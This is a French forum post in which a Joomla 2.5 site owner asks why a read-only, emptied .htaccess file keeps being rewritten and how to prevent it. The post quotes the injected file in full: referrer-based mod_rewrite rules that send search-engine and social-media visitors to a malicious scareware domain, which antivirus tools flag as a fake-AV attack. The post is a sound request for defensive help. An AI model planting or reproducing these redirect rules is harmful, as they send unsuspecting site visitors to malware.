Bonjour,
J'ai créé un nouveau site sous joomla 2.5.x et quelques utilisateurs m'ont remonté un problème lors de l'activation de leurs comptes.
En effet, lorsque ces utilisateurs cliquent sur leurs liens d'activation, leurs antivirus (norton, avast) détectent un problème de sécurité :
Après quelques recherches, j'ai vu que cela pouvait venir de mon site même si les autres utilisateurs n'ont pas eu ce problème... J'ai donc cherché un peu d'où cela pouvait venir et je me suis penché sur le fichier .htaccess. Dans ce dernier j'ai vu des choses bizarres comme :
J'avais bien renommé le htaccess.txt mais dans le doute je l'ai supprimé et j'ai mis un .htaccess VIDE! Quelques heures plus tard, j'ai regardé le contenu du htaccess et j'y ai trouvé ce que je vous ai mis ci-dessus. J'ai testé l'adresse qui est stipulé dans le "RewriteRule" (A NE PAS TESTER!!!!) et ça redirige bien vers un scareware de type Fake AV Redirect 21.
Ma question est :
"Mon fichier .htaccess étant en lecture seul et vide à l'origine, comment peut il se retrouver modifié et comment empêcher cela?"
Merci d'avance pour votre aide
Toots
J'ai créé un nouveau site sous joomla 2.5.x et quelques utilisateurs m'ont remonté un problème lors de l'activation de leurs comptes.
En effet, lorsque ces utilisateurs cliquent sur leurs liens d'activation, leurs antivirus (norton, avast) détectent un problème de sécurité :
13/04/2012 09:25:31,Elevée,Une tentative d’intrusion par preventiontoolsscanning.info a été bloquée.,Bloqué,Aucune action nécessaire,Fake App Attack: Fake AV Redirect 21
Code:
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://kas-baa.ru/space?7 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://kas-baa.ru/space?7 [R=301,L] </IfModule>
Ma question est :
"Mon fichier .htaccess étant en lecture seul et vide à l'origine, comment peut il se retrouver modifié et comment empêcher cela?"
Merci d'avance pour votre aide
Toots
Commentaire